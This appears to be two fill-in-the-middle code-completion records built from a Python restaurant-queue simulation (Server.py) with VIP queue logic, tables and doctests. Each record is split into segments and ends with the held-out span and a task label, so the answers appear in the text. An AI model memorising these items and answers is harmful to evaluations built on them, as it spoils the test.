Server.py | (self.groups)
def isEmpty(self):
"""
Whether there are still groups waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # popping from the end of the list removes the group that arrived first
"""
Pop the head of the queue (index = length of queue - 1)
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When a group finishes their meal, set the table's current group to None
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
|
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group seated at it has finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list storing the total table occupancy time (requested dining time plus 2 minutes) for each group that has been or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is done; handle groups that were never assigned
if current_time == total_time - 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | """
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp | identifier_body |
Server.py | .groups)
def isEmpty(self):
"""
Whether there are still groups waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def | (self, group):
"""
Add the newly come group into queue properly
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # popping from the end of the list removes the group that arrived first
"""
Pop the head of the queue (index = length of queue - 1)
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When a group finishes their meal, set the table's current group to None
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group seated at it has finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list storing the total table occupancy time (requested dining time plus 2 minutes) for each group that has been or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is done; handle groups that were never assigned
if current_time == total_time - 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | add_queue | identifier_name |